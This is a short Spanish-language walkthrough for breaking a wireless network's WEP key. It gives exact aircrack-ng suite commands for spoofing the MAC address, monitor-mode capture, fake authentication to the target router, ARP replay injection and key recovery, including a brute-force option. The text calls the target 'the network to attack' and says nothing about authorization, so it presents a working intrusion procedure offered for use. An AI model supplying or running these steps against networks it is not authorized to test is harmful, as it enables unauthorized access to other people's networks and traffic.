1. Cambiar la dirección MAC del adaptador de red inalámbrico:
# ifconfig wlan0 down # macchanger -m 00:11:22:33:44:55 # ifconfig wlan0 up
2. Habilitar el adaptador de red inalámbrico para monitoreo de paquetes:
# airmon-ng start wlan0
3. Identificar las redes inalámbricas disponibles así como las MAC y canales de las mismas: # airodump-ng wlan0
4. Una vez identificadas las redes y canales disponibles, utilizar el filtro
correspondiente para enfocarse únicamente en el canal deseado y guardar el registro de paquetes en un archivo: # airodump-ng -c (número de canal) -w (nombre del archivo .cap) wlan0
5. Conectar con la red inalámbrica y con el ruteador correspondiente utilizando una
nueva solapa en la terminal: # aireplay-ng -1 0 -e (ESSID o nombre la red a atacar [en caso de que el nombre contenga espacios escribirlo entre comillas “”]) -a (MAC de la red a atacar o BSSID) -h (MAC propia establecida anteriormente en oo:11:22:33:44:55) wlan0
6. Acelerar el proceso de captura de paquetes:
# aireplay-ng -3 -b (MAC de la red a atacar o BSSID) -h (MAC propia establecida anteriormente en oo:11:22:33:44:55) wlan0
7. Una vez capturados 150.000 paquetes en ARP se puede proceder al descifrado de
la clave WEP utilizando una nueva solapa en la terminal: # aircrack-ng (nombre del archivo .cap)*.cap Este proceso es más lento # aircrack-ng (nombre del archivo .cap)*.cap -z Es más rápido pero requiere más paquetes capturados. # aircrack-ng (nombre del archivo .cap)*.cap -y Para utilizar fuerza bruta # aircrack-ng (combre del archivo .cap)*.cap -n 64 Para especificar la longitud de la clave WEP en bits: 64 para 40-bit WEP; 128 para 104-bit WEP, etc. El valor por defecto es 128 y en 2wire 64 bits.